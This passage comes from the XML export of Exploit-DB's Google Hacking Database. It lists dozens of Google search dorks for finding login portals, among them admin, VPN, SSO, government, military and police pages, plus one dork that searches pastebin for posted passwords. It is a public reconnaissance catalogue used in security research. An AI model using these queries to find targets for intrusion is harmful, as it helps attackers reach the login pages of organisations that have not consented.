<shortDescription>site:co.in inurl:/login.aspx</shortDescription>
<textualDescription># Google Dork: site:co.in inurl:/login.aspx
# Pages Containing Login Portals
# Date: 04/07/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>site:co.in inurl:/login.aspx</query>
<querystring>https://www.google.com/search?q=site:co.in inurl:/login.aspx</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>6444</id>
<link>https://www.exploit-db.com/ghdb/6444</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:com &quot;sap netweaver portal&quot;</shortDescription>
<textualDescription>Google Dork: site:com &quot;sap netweaver portal&quot;
Author: Berat ISLER (root1x)
Best Regards.
Berat ISLER (root1x)
</textualDescription>
<query>site:com &quot;sap netweaver portal&quot;</query>
<querystring>https://www.google.com/search?q=site:com &quot;sap netweaver portal&quot;</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>berat isler</author>
</entry>
<entry>
<id>7653</id>
<link>https://www.exploit-db.com/ghdb/7653</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:com inurl:/admin/login</shortDescription>
<textualDescription># Google Dork: site:com inurl:/admin/login
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>site:com inurl:/admin/login</query>
<querystring>https://www.google.com/search?q=site:com inurl:/admin/login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Suvendu Dash</author>
</entry>
<entry>
<id>5175</id>
<link>https://www.exploit-db.com/ghdb/5175</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:com inurl:b2blogin ext:cfm | jsp | php | aspx</shortDescription>
<textualDescription>Dork : site:com inurl:b2blogin ext:cfm | jsp | php | aspx
Description : this dork gives you all type of b2b login portals.
Author : botsec0
</textualDescription>
<query>site:com inurl:b2blogin ext:cfm | jsp | php | aspx</query>
<querystring>https://www.google.com/search?q=site:com inurl:b2blogin ext:cfm | jsp | php | aspx</querystring>
<edb></edb>
<date>2019-04-10</date>
<author>botsec0</author>
</entry>
<entry>
<id>5338</id>
<link>https://www.exploit-db.com/ghdb/5338</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:conf.*.com/signin/</shortDescription>
<textualDescription># Exploit Title: Sign-in for Conference Subdomain site
# Google Dork: site:conf.*.com/signin/
# Author: Francis Al Victoriano
</textualDescription>
<query>site:conf.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:conf.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>8051</id>
<link>https://www.exploit-db.com/ghdb/8051</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:cp.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:cp.*.* intitle:&quot;login&quot;
# Pages Containing Login Portals
# Date: 31/10/2022
# Exploit Author: Reza Abasi </textualDescription>
<query>site:cp.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:cp.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2023-02-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5524</id>
<link>https://www.exploit-db.com/ghdb/5524</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:cpanel.*.* intitle:&quot;login&quot; -site:forums.cpanel.net</shortDescription>
<textualDescription>Login Portal:
site:cpanel.*.* intitle:&quot;login&quot; -site:forums.cpanel.net
Reza Abasi(Turku)
</textualDescription>
<query>site:cpanel.*.* intitle:&quot;login&quot; -site:forums.cpanel.net</query>
<querystring>https://www.google.com/search?q=site:cpanel.*.* intitle:&quot;login&quot; -site:forums.cpanel.net</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5506</id>
<link>https://www.exploit-db.com/ghdb/5506</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:dev.*.*/signin</shortDescription>
<textualDescription>Google Dork Submission for finding developers login pages for various places.
site:dev.*.*/signin
site:account.*.*/signin
Author: MiningOmerta
</textualDescription>
<query>site:dev.*.*/signin</query>
<querystring>https://www.google.com/search?q=site:dev.*.*/signin</querystring>
<edb></edb>
<date>2019-09-05</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>8098</id>
<link>https://www.exploit-db.com/ghdb/8098</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:email.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:email.*.* intitle:&quot;login&quot;
# Pages Containing Login Portals
# Date:28/02/2023
# Exploit Author: Reza Abasi</textualDescription>
<query>site:email.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:email.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2023-02-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5499</id>
<link>https://www.exploit-db.com/ghdb/5499</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:exchange.*.*/owa/</shortDescription>
<textualDescription>Login Portal:
site:exchange.*.*/owa/
Reza Abasi(Turku)
</textualDescription>
<query>site:exchange.*.*/owa/</query>
<querystring>https://www.google.com/search?q=site:exchange.*.*/owa/</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6530</id>
<link>https://www.exploit-db.com/ghdb/6530</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:ftp.*.* &quot;CrushFTP WebInterface&quot;</shortDescription>
<textualDescription># Google Dork: site:ftp.*.* &quot;CrushFTP WebInterface&quot;
# Pages containing login portals.
# Date: 10/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:ftp.*.* &quot;CrushFTP WebInterface&quot;</query>
<querystring>https://www.google.com/search?q=site:ftp.*.* &quot;CrushFTP WebInterface&quot;</querystring>
<edb></edb>
<date>2020-09-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5469</id>
<link>https://www.exploit-db.com/ghdb/5469</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:ftp://ftp.*.*/login -inurl:https://</shortDescription>
<textualDescription>Login Portals:
site:ftp://ftp.*.*/login -inurl:https://
Reza ABasi(Turku)
</textualDescription>
<query>site:ftp://ftp.*.*/login -inurl:https://</query>
<querystring>https://www.google.com/search?q=site:ftp://ftp.*.*/login -inurl:https://</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6363</id>
<link>https://www.exploit-db.com/ghdb/6363</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:gov.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</shortDescription>
<textualDescription>Description: *site:gov.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;*
*Various government website login pages.*
</textualDescription>
<query>site:gov.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:gov.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-07-02</date>
<author>Dharmveer Singh</author>
</entry>
<entry>
<id>7143</id>
<link>https://www.exploit-db.com/ghdb/7143</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:gov.in intitle: admin login</shortDescription>
<textualDescription># Google Dork: site:gov.in intitle: admin login
# Pages Containing Login Portals
# Date: 29/08/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>site:gov.in intitle: admin login</query>
<querystring>https://www.google.com/search?q=site:gov.in intitle: admin login</querystring>
<edb></edb>
<date>2021-09-01</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7679</id>
<link>https://www.exploit-db.com/ghdb/7679</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:gov.in inurl:/admin/login</shortDescription>
<textualDescription># Google Dork: site:gov.in inurl:/admin/login
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Suvendu Dash</textualDescription>
<query>site:gov.in inurl:/admin/login</query>
<querystring>https://www.google.com/search?q=site:gov.in inurl:/admin/login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Suvendu Dash</author>
</entry>
<entry>
<id>5428</id>
<link>https://www.exploit-db.com/ghdb/5428</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:identity.*.*/login</shortDescription>
<textualDescription>Login Page:
site:identity.*.*/login
site:imap.*.*/login
site:smtp.*.*/login
site:store.*.*/login
my.*.*/login
site:management.*.*/login
Reza Abasi(Turku)
</textualDescription>
<query>site:identity.*.*/login</query>
<querystring>https://www.google.com/search?q=site:identity.*.*/login</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7646</id>
<link>https://www.exploit-db.com/ghdb/7646</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:in inurl:/admin/login</shortDescription>
<textualDescription># Google Dork: site:in inurl:/admin/login
# Pages Containing Login Portals
# Date: 07/11/2021
# Exploit Author: Arzan Batliwala</textualDescription>
<query>site:in inurl:/admin/login</query>
<querystring>https://www.google.com/search?q=site:in inurl:/admin/login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Arzan Batliwala</author>
</entry>
<entry>
<id>5486</id>
<link>https://www.exploit-db.com/ghdb/5486</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:intranet.*.*/login/</shortDescription>
<textualDescription>Login Portal:
site:intranet.*.*/login/
Reza Abasi(Turku)
</textualDescription>
<query>site:intranet.*.*/login/</query>
<querystring>https://www.google.com/search?q=site:intranet.*.*/login/</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6543</id>
<link>https://www.exploit-db.com/ghdb/6543</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:jira.*.* inurl:/customer/portal/</shortDescription>
<textualDescription># Google Dork: site:jira.*.* inurl:/customer/portal/
# Jira login portals.
# Date: 16/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:jira.*.* inurl:/customer/portal/</query>
<querystring>https://www.google.com/search?q=site:jira.*.* inurl:/customer/portal/</querystring>
<edb></edb>
<date>2020-09-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3829</id>
<link>https://www.exploit-db.com/ghdb/3829</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:login.*.*</shortDescription>
<textualDescription>DORK:site:login.*.*
Description: Allow User To View
Login Panel Of Many WebSites..
Author:MTK
DATED: 13-1-1</textualDescription>
<query>site:login.*.*</query>
<querystring>https://www.google.com/search?q=site:login.*.*</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5395</id>
<link>https://www.exploit-db.com/ghdb/5395</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:login.*.* intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription>Login page :
site:login.*.* intitle:&quot;Admin Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:login.*.* intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=site:login.*.* intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8335</id>
<link>https://www.exploit-db.com/ghdb/8335</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:login.*.* site:portal.*.*</shortDescription>
<textualDescription># Google Dork: site:login.*.* site:portal.*.*
# Pages Containing Login Portals
# Date: 09/11/2023
# Exploit: Anas Zakir</textualDescription>
<query>site:login.*.* site:portal.*.*</query>
<querystring>https://www.google.com/search?q=site:login.*.* site:portal.*.*</querystring>
<edb></edb>
<date>2023-11-09</date>
<author>Anas Zakir</author>
</entry>
<entry>
<id>5337</id>
<link>https://www.exploit-db.com/ghdb/5337</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:login.*.com/signin/</shortDescription>
<textualDescription># Exploit Title: Sign-in for Subdomain Site
# Google Dork: site:login.*.com/signin/
# Author: Francis Al Victoriano
</textualDescription>
<query>site:login.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:login.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>7147</id>
<link>https://www.exploit-db.com/ghdb/7147</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:login.microsoftonline.com -error</shortDescription>
<textualDescription># Google Dork: *site:login.microsoftonline.com
# Pages Containing Login Portals
# Date: 30/08/2021
# Exploit Author: Brahmaraj Rathod</textualDescription>
<query>site:login.microsoftonline.com -error</query>
<querystring>https://www.google.com/search?q=site:login.microsoftonline.com -error</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>Brahmaraj Rathod</author>
</entry>
<entry>
<id>5407</id>
<link>https://www.exploit-db.com/ghdb/5407</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:mail.*.*/auth</shortDescription>
<textualDescription>Login Pages:
site:mail.*.*/auth
site:login.*.*/auth
site:signin.*.*/auth
Reza Abasi(Turku)
</textualDescription>
<query>site:mail.*.*/auth</query>
<querystring>https://www.google.com/search?q=site:mail.*.*/auth</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5483</id>
<link>https://www.exploit-db.com/ghdb/5483</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:management.*.*/login/</shortDescription>
<textualDescription>Login Portal:
site:management.*.*/login/
Reza Abasi(Turku)
</textualDescription>
<query>site:management.*.*/login/</query>
<querystring>https://www.google.com/search?q=site:management.*.*/login/</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5400</id>
<link>https://www.exploit-db.com/ghdb/5400</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:member.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login page :
site:member.*.* intitle:&quot;login&quot;
site:member.*.* intitle:&quot;signin&quot;
site:member.*.* intitle:&quot;logon&quot;
site:*/members.php intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:member.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:member.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5196</id>
<link>https://www.exploit-db.com/ghdb/5196</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:mil ext:cfm inurl:login.cfm</shortDescription>
<textualDescription>Dork : site:mil ext:cfm inurl:login.cfm
Description : this dork will give you coldfusion login portals of mil websites.
Author : botsec0
</textualDescription>
<query>site:mil ext:cfm inurl:login.cfm</query>
<querystring>https://www.google.com/search?q=site:mil ext:cfm inurl:login.cfm</querystring>
<edb></edb>
<date>2019-04-30</date>
<author>botsec0</author>
</entry>
<entry>
<id>5482</id>
<link>https://www.exploit-db.com/ghdb/5482</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:monitor.*.*/login intitle:&quot;Login&quot;</shortDescription>
<textualDescription>Login Portal:
site:monitor.*.*/login intitle:&quot;Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:monitor.*.*/login intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=site:monitor.*.*/login intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5484</id>
<link>https://www.exploit-db.com/ghdb/5484</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:moodle.*.*/login</shortDescription>
<textualDescription>Login Portal:
site:moodle.*.*/login/
Reza Abasi(Turku)
</textualDescription>
<query>site:moodle.*.*/login</query>
<querystring>https://www.google.com/search?q=site:moodle.*.*/login</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6752</id>
<link>https://www.exploit-db.com/ghdb/6752</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:p2.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>site:p2.*.* intitle:&quot;login&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>site:p2.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:p2.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2021-01-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5599</id>
<link>https://www.exploit-db.com/ghdb/5599</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:passport.*.*/login</shortDescription>
<textualDescription>Login Portal:
site:passport.*.*/login
Reza Abasi(Turku)
</textualDescription>
<query>site:passport.*.*/login</query>
<querystring>https://www.google.com/search?q=site:passport.*.*/login</querystring>
<edb></edb>
<date>2019-10-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6706</id>
<link>https://www.exploit-db.com/ghdb/6706</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:password.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Pages containing login portal:
site:password.*.* intitle:&quot;login&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>site:password.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:password.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7213</id>
<link>https://www.exploit-db.com/ghdb/7213</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:pastebin.com intext:&quot;password&quot; | intitle:&quot;password&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:&quot;password&quot; | intitle:&quot;password&quot;
# Pages Containing Login Portals
# Date: 11/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intext:&quot;password&quot; | intitle:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;password&quot; | intitle:&quot;password&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>6450</id>
<link>https://www.exploit-db.com/ghdb/6450</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:police.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:police.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;
# By using this dork, we can extract various police station login portals
# Date: 3/07/2020
# Author: Dharmveer Singh*
[image: image.png]
</textualDescription>
<query>site:police.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:police.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Dharmveer Singh</author>
</entry>
<entry>
<id>6697</id>
<link>https://www.exploit-db.com/ghdb/6697</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:portal.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Pages containing login portal:
site:portal.*.* intitle:&quot;login&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>site:portal.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:portal.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5335</id>
<link>https://www.exploit-db.com/ghdb/5335</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:portal.*.com/signin/</shortDescription>
<textualDescription># Exploit Title: Sign-in Portal Subdomain
# Google Dork: site:portal.*.com/signin/
# Author: Francis Al Victoriano
</textualDescription>
<query>site:portal.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:portal.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>8338</id>
<link>https://www.exploit-db.com/ghdb/8338</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:prod.*.* inurl:login</shortDescription>
<textualDescription># Google Dork: site:prod.*.* inurl:login
# Pages Containing Login Portals
# Date: 10/11/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>site:prod.*.* inurl:login</query>
<querystring>https://www.google.com/search?q=site:prod.*.* inurl:login</querystring>
<edb></edb>
<date>2023-11-10</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>5500</id>
<link>https://www.exploit-db.com/ghdb/5500</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:remote.*.* intitle:&quot;User Authentication&quot;</shortDescription>
<textualDescription>Login portal:
site:remote.*.* intitle:&quot;User Authentication&quot;
intitle:&quot;User Authentication&quot; site:*/sslvpn_logon.shtml&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:remote.*.* intitle:&quot;User Authentication&quot;</query>
<querystring>https://www.google.com/search?q=site:remote.*.* intitle:&quot;User Authentication&quot;</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5443</id>
<link>https://www.exploit-db.com/ghdb/5443</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:secure.*.* intitle:&quot;log in&quot;</shortDescription>
<textualDescription>Login Portal:
site:secure.*.* intitle:&quot;log in&quot;
site:secure.*.* intitle:&quot;sign in&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:secure.*.* intitle:&quot;log in&quot;</query>
<querystring>https://www.google.com/search?q=site:secure.*.* intitle:&quot;log in&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6637</id>
<link>https://www.exploit-db.com/ghdb/6637</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:sftp.*.*/ intext:&quot;login&quot; intitle:&quot;server login&quot;</shortDescription>
<textualDescription># Google Dork: site:sftp.*.*/ intext:&quot;login&quot; intitle:&quot;server login&quot;
# Pages containing login portals.
# Date: 24/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:sftp.*.*/ intext:&quot;login&quot; intitle:&quot;server login&quot;</query>
<querystring>https://www.google.com/search?q=site:sftp.*.*/ intext:&quot;login&quot; intitle:&quot;server login&quot;</querystring>
<edb></edb>
<date>2020-10-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5392</id>
<link>https://www.exploit-db.com/ghdb/5392</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:signin.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login page :
site:signin.*.* intitle:&quot;login&quot;
site:mail.*.* intitle:&quot;login&quot;
site:signin.*.*/ intitle:&quot;signin&quot; -facebook.com
Reza Abasi(Turku)
</textualDescription>
<query>site:signin.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:signin.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5505</id>
<link>https://www.exploit-db.com/ghdb/5505</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:smtp.*.*/login</shortDescription>
<textualDescription>Login Portal:
site:smtp.*.*/login
site:owa.*.*/login
site:controlpanel.*.*/login
site:pop.*.*/login
site:ww1.*.*/login
site:support.*.*/login
site:app.*.*/login
site:*/Admin/Login/
site:auth.*.*/login
site:imap.*.* intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:smtp.*.*/login</query>
<querystring>https://www.google.com/search?q=site:smtp.*.*/login</querystring>
<edb></edb>
<date>2019-09-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7723</id>
<link>https://www.exploit-db.com/ghdb/7723</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:smtp3.*.*/login</shortDescription>
<textualDescription># Google Dork: site:smtp3.*.*/login
# Pages Containing Login Portals
# Date: 09/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:smtp3.*.*/login</query>
<querystring>https://www.google.com/search?q=site:smtp3.*.*/login</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>5339</id>
<link>https://www.exploit-db.com/ghdb/5339</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:social.*.com/signin/</shortDescription>
<textualDescription># Exploit Title: Sign-in Social Website Subdomain
# Google Dork: site:social.*.com/signin/
# Author: Francis Al Victoriano
</textualDescription>
<query>site:social.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:social.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5393</id>
<link>https://www.exploit-db.com/ghdb/5393</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:sso.*.* intitle:&quot;Login&quot;</shortDescription>
<textualDescription>Login page :
site:sso.*.* intitle:&quot;Login&quot;
site:ssologin.*.* intitle:&quot;Single sign on&quot;
site:*/sso/XUI/#login/
Reza Abasi(Turku)
</textualDescription>
<query>site:sso.*.* intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=site:sso.*.* intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5444</id>
<link>https://www.exploit-db.com/ghdb/5444</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:sts.*.*/adfs/ls/?SAMLRequest= intitle:&quot;sign in&quot;</shortDescription>
<textualDescription>Login Page:
site:sts.*.*/adfs/ls/?SAMLRequest= intitle:&quot;sign in&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:sts.*.*/adfs/ls/?SAMLRequest= intitle:&quot;sign in&quot;</query>
<querystring>https://www.google.com/search?q=site:sts.*.*/adfs/ls/?SAMLRequest= intitle:&quot;sign in&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6700</id>
<link>https://www.exploit-db.com/ghdb/6700</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:user.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Pages containing login portal:
site:user.*.* intitle:&quot;login&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>site:user.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:user.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6336</id>
<link>https://www.exploit-db.com/ghdb/6336</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:vpn.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:vpn.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;
# Various VPN login pages.
# Date: 29/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:vpn.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:vpn.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5417</id>
<link>https://www.exploit-db.com/ghdb/5417</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:vpn.*.*/ intitle:&quot;login&quot;</shortDescription>
<textualDescription>VPN Login Pages:
site:vpn.*.*/ intitle:&quot;login&quot;
Reza Abasi
</textualDescription>
<query>site:vpn.*.*/ intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:vpn.*.*/ intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5597</id>
<link>https://www.exploit-db.com/ghdb/5597</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:watch.*.*/login</shortDescription>
<textualDescription>Login Portal:
site:watch.*.*/login
Reza Abasi(Turku)
</textualDescription>
<query>site:watch.*.*/login</query>
<querystring>https://www.google.com/search?q=site:watch.*.*/login</querystring>
<edb></edb>
<date>2019-10-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7190</id>
<link>https://www.exploit-db.com/ghdb/7190</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:wiki.*.com inurl:login.action</shortDescription>
<textualDescription># Google Dork: site:wiki.*.com inurl:login.action
# Pages Containing Login Portals
# Date: 07/09/2021
# Exploit Author: Brahmaraj Rathod</textualDescription>
<query>site:wiki.*.com inurl:login.action</query>
<querystring>https://www.google.com/search?q=site:wiki.*.com inurl:login.action</querystring>
<edb></edb>
<date>2021-09-13</date>
<author>Brahmaraj Rathod</author>
</entry>
<entry>
<id>4189</id>
<link>https://www.exploit-db.com/ghdb/4189</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:www.comune.*.*.* inurl:login</shortDescription>
<textualDescription># Exploit Title: Dork to find Comune Websites.
# Google Dork: site:www.comune.*.*.* inurl:login
# Description : Finds out login portals to Comune Websites.
# Date: 27/01/2016
# Author: XDarkCoder
</textualDescription>
<query>Site:www.comune.*.*.* inurl:login</query>
<querystring>https://www.google.com/search?q=site:www.comune.*.*.* inurl:login</querystring>
<edb></edb>
<date>2016-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4193</id>
<link>https://www.exploit-db.com/ghdb/4193</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:www.tribunale.*.*.* inurl:login</shortDescription>
<textualDescription># Exploit Title: Dork to find Tribunale Websites.
# Google Dork: site:www.tribunale.*.*.* inurl:login
# Description : Finds out login portals on Tribunale Websites. Gov related
# Date: 07/02/2016
# Exploit Author: XDarkCoder</textualDescription>
<query>site:www.tribunale.*.*.* inurl:login</query>
<querystring>https://www.google.com/search?q=site:www.tribunale.*.*.* inurl:login</querystring>
<edb></edb>
